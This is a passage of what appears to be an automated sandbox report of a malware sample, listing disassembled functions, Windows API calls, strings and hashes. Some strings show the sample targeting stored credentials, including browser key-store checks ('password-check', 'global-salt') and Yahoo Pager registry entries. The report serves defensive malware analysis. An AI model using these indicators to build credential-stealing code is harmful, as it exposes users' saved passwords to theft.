                                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403AFA
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWidememset$FileWritestrlen
                                                            • String ID:
                                                            • API String ID: 1786725549-0
                                                            • Opcode ID: 8b1d9e4dc4f74ac6a4b9f20da3a4dce8e7e5bfac1d9ec588bc9247bb7228e3eb
                                                            • Instruction ID: 75a67b34ad05bb499385cce9778aa698b1b4849105f4284936cacb9952f60aa3
                                                            • Opcode Fuzzy Hash: 8b1d9e4dc4f74ac6a4b9f20da3a4dce8e7e5bfac1d9ec588bc9247bb7228e3eb
                                                            • Instruction Fuzzy Hash: 291121B680112CBEFB119BA4DCC5EEB73ADDF09355F0005A6B715D2092E6349F448B78
                                                            Function 0040C143 Relevance: 9.1, APIs: 6, Instructions: 54fileclipboardCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetTempPathA.KERNEL32(00000104,?), ref: 0040C15D
                                                            • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040C16F
                                                            • GetTempFileNameA.KERNEL32(?,0044D644,00000000,?), ref: 0040C191
                                                            • OpenClipboard.USER32(?), ref: 0040C1B1
                                                            • GetLastError.KERNEL32 ref: 0040C1CA
                                                            • DeleteFileA.KERNEL32(00000000), ref: 0040C1E7
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
                                                            • String ID:
                                                            • API String ID: 2014771361-0
                                                            • Opcode ID: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                            • Instruction ID: f62812a52b3c8d3971b783ccdfc9367edaf682a71d5855f6ec34303c2df0b61c
                                                            • Opcode Fuzzy Hash: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                            • Instruction Fuzzy Hash: 69115276600218ABDB609B61DCCDFCB77BC9F15705F0401B6B685E60A2EBB499848F68
                                                            Function 0040613B Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 51COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memcmp.MSVCRT(-00000001,00456EA0,00000010,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 00406151
                                                              • Part of subcall function 0040607F: memcmp.MSVCRT(00000000,0040616C,00000004,00000000), ref: 0040609D
                                                              • Part of subcall function 0040607F: memcpy.MSVCRT(00000268,0000001A,?,00000000), ref: 004060CC
                                                              • Part of subcall function 0040607F: memcpy.MSVCRT(-00000368,0000001F,00000060,00000268,0000001A,?,00000000), ref: 004060E1
                                                            • memcmp.MSVCRT(-00000001,password-check,0000000E,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 0040617C
                                                            • memcmp.MSVCRT(-00000001,global-salt,0000000B,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 004061A4
                                                            • memcpy.MSVCRT(0000013F,00000000,00000000), ref: 004061C1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memcmp$memcpy
                                                            • String ID: global-salt$password-check
                                                            • API String ID: 231171946-3927197501
                                                            • Opcode ID: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                            • Instruction ID: a9589356fa14544f03300d4f181c1951213ca66e4b0bd31de1399f3a3b520bb8
                                                            • Opcode Fuzzy Hash: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                            • Instruction Fuzzy Hash: BB01FC70A003446EEF212A128C02B4F37569F50769F014037FE0A782C3E67DD679864D
                                                            Function 00443473 Relevance: 9.0, APIs: 6, Instructions: 46COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ??3@YAXPAX@Z.MSVCRT(?,0044418F,004441FB,?,00000000), ref: 00443481
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 0044349C
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434B2
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434C8
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434DE
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434F4
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ??3@
                                                            • String ID:
                                                            • API String ID: 613200358-0
                                                            • Opcode ID: ae7dc868dc48665b139d307d1f96ab593ff6b37e90ec57b5cf83d7c40c642e89
                                                            • Instruction ID: 2c47959068043e69134c65afad444586b1a09f576c08bcd621988c2a5a0f38ec
                                                            • Opcode Fuzzy Hash: ae7dc868dc48665b139d307d1f96ab593ff6b37e90ec57b5cf83d7c40c642e89
                                                            • Instruction Fuzzy Hash: 3C016272E46D7167E2167E326402B8FA358AF40F2BB16010FF80477682CB2CBE5045EE
                                                            Function 00401694 Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetClientRect.USER32(?,?), ref: 004016A3
                                                            • GetSystemMetrics.USER32(00000015), ref: 004016B1
                                                            • GetSystemMetrics.USER32(00000014), ref: 004016BD
                                                            • BeginPaint.USER32(?,?), ref: 004016D7
                                                            • DrawFrameControl.USER32(00000000,?,00000003,00000008), ref: 004016E6
                                                            • EndPaint.USER32(?,?), ref: 004016F3
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                            • String ID:
                                                            • API String ID: 19018683-0
                                                            • Opcode ID: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                                            • Instruction ID: cf01e476fd02228c824cf2568a7310e823bc3a91870265851f050ef0b1242b16
                                                            • Opcode Fuzzy Hash: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                                            • Instruction Fuzzy Hash: 81012C76900218AFDF44DFE4DC849EE7B79FB45301F040569EA11AA1A4DAB0A904CB50
                                                            Function 004063B2 Relevance: 8.9, APIs: 7, Instructions: 157COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memset.MSVCRT ref: 0040644F
                                                            • memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                            • memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                              • Part of subcall function 00404888: memset.MSVCRT ref: 004048C2
                                                              • Part of subcall function 00404888: memset.MSVCRT ref: 004048D6
                                                              • Part of subcall function 00404888: memset.MSVCRT ref: 004048EA
                                                              • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
                                                              • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E
                                                            • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,00000060,?,?,?,00000040,00406667,?,?,?), ref: 004064B9
                                                            • memcpy.MSVCRT(?,00000060,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 004064CC
                                                            • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,?,?,?,?,?,?,?,?,?), ref: 004064F9
                                                            • memcpy.MSVCRT(?,?,00000014,?,?,?,?,?,?,?,?,?), ref: 0040650E
                                                              • Part of subcall function 00406286: memcpy.MSVCRT(?,?,00000008,?,?,?,?,?), ref: 004062B2
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memcpy$memset
                                                            • String ID:
                                                            • API String ID: 438689982-0
                                                            • Opcode ID: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                            • Instruction ID: e4a864fa4e69ec142fe4fd7b7713e32d962165e503c4b70a0fc0dcfbb4c29d3a
                                                            • Opcode Fuzzy Hash: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                            • Instruction Fuzzy Hash: 41415FB290054DBEEB51DAE9CC41EEFBB7CAB48344F004476F708F7151E634AA498BA5
                                                            Function 0044493E Relevance: 8.9, APIs: 7, Instructions: 147stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memset.MSVCRT ref: 0044495F
                                                            • memset.MSVCRT ref: 00444978
                                                            • memset.MSVCRT ref: 0044498C
                                                              • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                                            • strlen.MSVCRT ref: 004449A8
                                                            • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 004449CD
                                                            • memcpy.MSVCRT(?,?,00000008,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 004449E3
                                                              • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                              • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                                              • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                                              • Part of subcall function 0040D2A3: memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                              • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                                            • memcpy.MSVCRT(?,?,00000008,?,?,?,?,00000008,?,00000000,00000000), ref: 00444A23
                                                              • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                              • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                              • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memcpymemset$strlen
                                                            • String ID:
                                                            • API String ID: 2142929671-0
                                                            • Opcode ID: 222256a1374bd43cf022861c561c1c3192c4ec1bcf54050736f6a4219f509775
                                                            • Instruction ID: aa4dc9b89352709bd4c521be83aedc2b1fb2a96970f66ede65b30d7c79a4835d
                                                            • Opcode Fuzzy Hash: 222256a1374bd43cf022861c561c1c3192c4ec1bcf54050736f6a4219f509775
                                                            • Instruction Fuzzy Hash: 96513B7290015DAFDB10EF95CC81AEEB7B8FB44308F5445AAE509A7141EB34EA898F94
                                                            Function 00408DB6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 100stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _mbscpy.MSVCRT(0045A550,strings,?,?,00409CE2,?,?,?,?,?,00000000,75D50A60), ref: 00408E31
                                                              • Part of subcall function 00409240: _itoa.MSVCRT ref: 00409261
                                                            • strlen.MSVCRT ref: 00408E4F
                                                            • LoadStringA.USER32(00000000,0000000D,?,?), ref: 00408E7F
                                                            • memcpy.MSVCRT(00000000,00000001,?,?,?,?,?,00000000,75D50A60), ref: 00408EBE
                                                              • Part of subcall function 00408D34: ??2@YAPAXI@Z.MSVCRT(00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,75D50A60), ref: 00408D5C
                                                              • Part of subcall function 00408D34: ??2@YAPAXI@Z.MSVCRT(00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,75D50A60), ref: 00408D7A
                                                              • Part of subcall function 00408D34: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,75D50A60), ref: 00408D98
                                                              • Part of subcall function 00408D34: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,75D50A60), ref: 00408DA8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ??2@$LoadString_itoa_mbscpymemcpystrlen
                                                            • String ID: strings
                                                            • API String ID: 4036804644-3030018805
                                                            • Opcode ID: fb972dfd3e57adfc3ba40d615c3f9c5d1a1752d68bd78c6c00ac9518cee6e209
                                                            • Instruction ID: 8088189cea062d7f30cfe1d816b9e84d6c9af13e32ba145f50863190e1f773ff
                                                            • Opcode Fuzzy Hash: fb972dfd3e57adfc3ba40d615c3f9c5d1a1752d68bd78c6c00ac9518cee6e209
                                                            • Instruction Fuzzy Hash: 4B3170B1101722AFD715DB15ED41E733766E7803067124A3FE981972A3CB39E8A1CB9E
                                                            Function 004032B7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 82stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00403166: strchr.MSVCRT ref: 0040327B
                                                            • memset.MSVCRT ref: 0040330B
                                                            • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403325
                                                            • strchr.MSVCRT ref: 0040335A
                                                              • Part of subcall function 004023E5: _mbsicmp.MSVCRT ref: 0040241D
                                                            • strlen.MSVCRT ref: 0040339C
                                                              • Part of subcall function 004023E5: _mbscmp.MSVCRT ref: 004023F9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                                                            • String ID: Personalities
                                                            • API String ID: 2103853322-4287407858
                                                            • Opcode ID: 5b98b57a55da65def1d776efa7645d3f4e73defe10c1c776d6f69e105cfa83b8
                                                            • Instruction ID: 7d10b282734f65fdb38f5d5bab0bdada953f1de7ece3d1168d652590bcd45cd6
                                                            • Opcode Fuzzy Hash: 5b98b57a55da65def1d776efa7645d3f4e73defe10c1c776d6f69e105cfa83b8
                                                            • Instruction Fuzzy Hash: 6C21A872A041486AEB11EF699C81ADEBB7C9B51305F14007BFB04F7181DA7CDB46C66D
                                                            Function 00444551 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 51registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memset.MSVCRT ref: 00444573
                                                              • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                              • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00410E73,?,?,?,?,00410E73,00000000,?,?), ref: 00410AF8
                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: CloseOpenQueryValuememset
                                                            • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                                                            • API String ID: 1830152886-1703613266
                                                            • Opcode ID: c25afbc6681bd6f67a4f4f243a5a512b3b390374a029d0210c15856865fede48
                                                            • Instruction ID: e49b40feb516e52fd010a51085a75c79e183d02607987ed0dc43077d9115a6c0
                                                            • Opcode Fuzzy Hash: c25afbc6681bd6f67a4f4f243a5a512b3b390374a029d0210c15856865fede48
                                                            • Instruction Fuzzy Hash: E80196B6A00118BBEF11AA569D01F9A777CDF90355F1000A6FF08F2212E6749F599698
                                                            Function 00406D77 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLastError.KERNEL32(?), ref: 00406D87
                                                            • sprintf.MSVCRT ref: 00406DAF
                                                            • MessageBoxA.USER32(00000000,?,Error,00000030), ref: 00406DC8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastMessagesprintf
                                                            • String ID: Error$Error %d: %s
                                                            • API String ID: 1670431679-1552265934
                                                            • Opcode ID: 01084951b307502bfaf43d4fbd3e54dffba0eab1b535d90173241ec551fbeaa7
                                                            • Instruction ID: a7eabb7ac59324d00fe13b249bdc4a7432a02f94c8438c44d3dfd779c6ab1540
                                                            • Opcode Fuzzy Hash: 01084951b307502bfaf43d4fbd3e54dffba0eab1b535d90173241ec551fbeaa7
                                                            • Instruction Fuzzy Hash: AEF0A77A8001086BDB10A7A4DC05FA676BCBB44344F1500B6B945F2151EA74DA058F98
                                                            Function 00410F99 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 21libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(shlwapi.dll,000003ED,752671C0,00405EC6,00000000), ref: 00410FA2
                                                            • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 00410FB0
                                                            • FreeLibrary.KERNEL32(00000000), ref: 00410FC8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Library$AddressFreeLoadProc
                                                            • String ID: SHAutoComplete$shlwapi.dll
                                                            • API String ID: 145871493-1506664499
                                                            • Opcode ID: abe26a1acc7de01d0fbbea04bf45f8b750203d7cb8a5a0f94c9348c994a43a28
                                                            • Instruction ID: 0aecfb21e5a5e73b57ea68f7d566dfb4b74aadbd5913b1eaff8a54c705ff6fdb
                                                            • Opcode Fuzzy Hash: abe26a1acc7de01d0fbbea04bf45f8b750203d7cb8a5a0f94c9348c994a43a28
                                                            • Instruction Fuzzy Hash: F9D05B3E3026106BB6615B366C89EAFAAD5DFCA75271D0031F940E2150CB644C438D69
                                                            Function 0043DF30 Relevance: 8.0, APIs: 3, Strings: 2, Instructions: 479COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memset.MSVCRT ref: 0043DFC5
                                                            • memset.MSVCRT ref: 0043DFFE
                                                            • memcpy.MSVCRT(00000001,B2850F59,00000000,?,00000001,00000000), ref: 0043E27C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memset$memcpy
                                                            • String ID: $no query solution
                                                            • API String ID: 368790112-326442043
                                                            • Opcode ID: f59ee7c535991b4e4c1e2cd699b4550ba87100c19ab38750288448e459f31128
                                                            • Instruction ID: 13ed0bad29dc8f20330308844ce1f2220340576076c9bd20db88b336710dfa55
                                                            • Opcode Fuzzy Hash: f59ee7c535991b4e4c1e2cd699b4550ba87100c19ab38750288448e459f31128
                                                            • Instruction Fuzzy Hash: 46128A75D01619DFCB24CF9AC481AAEB7F1FF08314F14916EE895AB391D338A981CB58
                                                            Function 004309ED Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 238COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            • unknown column "%s" in foreign key definition, xrefs: 00430C59
                                                            • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 00430A65
                                                            • foreign key on %s should reference only one column of table %T, xrefs: 00430A3D
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memcpy
                                                            • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                            • API String ID: 3510742995-272990098
                                                            • Opcode ID: e0adb55311b2422536510ae49f56a80dd71403a501fe8d14b1b43f202caa477a
                                                            • Instruction ID: 56a33166dce8f22c91c9f8fabbbf61fd3f81eb66f6c7064346fd2a8112c6bbd6
                                                            • Opcode Fuzzy Hash: e0adb55311b2422536510ae49f56a80dd71403a501fe8d14b1b43f202caa477a
                                                            • Instruction Fuzzy Hash: 32A14A71A00209DFCB14DF98D5909AEBBF1FF49704F24925EE805AB312D739EA41CB98
                                                            Function 0043D62C Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 224COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memset
                                                            • String ID: H
                                                            • API String ID: 2221118986-2852464175
                                                            • Opcode ID: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                                            • Instruction ID: 41a1901620add3bbd0c629c105807ca0f7ae5b253a5bd6696a221ab72d79fc9a
                                                            • Opcode Fuzzy Hash: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                                            • Instruction Fuzzy Hash: C0916C75D00219DFDF24DFA5D881AEEB7B5FF48300F10849AE959AB201E734AA45CF98
                                                            Function 0042563B Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 176COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memcpy
                                                            • String ID: out of memory$statement aborts at %d: [%s] %s$string or blob too big
                                                            • API String ID: 3510742995-3170954634
                                                            • Opcode ID: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                                            • Instruction ID: e987c9c84479fff69dc62f11a90029b17cbd8b5ab9a96ddea988199e68ce63eb
                                                            • Opcode Fuzzy Hash: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                                            • Instruction Fuzzy Hash: 2361C235B006259FCB04DF68E484BAEFBF1BF44314F55809AE904AB352D738E980CB98
                                                            Function 0041DB51 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 176COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0041384F: memcpy.MSVCRT(?,00417664,00000004,?,CwA,00417664,?,?,00417743,?,?,?,?), ref: 0041385C
                                                            • memcmp.MSVCRT(?,?,00000004,00000000,?,?,0041DE5E,?,?,?,?,00436073), ref: 0041DBAE
                                                            • memcmp.MSVCRT(?,SQLite format 3,00000010,00000000,?,?,0041DE5E,?,?,?), ref: 0041DBDB
                                                            • memcmp.MSVCRT(?,@ ,00000003,?,?,?,00000000,?,?,0041DE5E,?,?,?), ref: 0041DC47
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
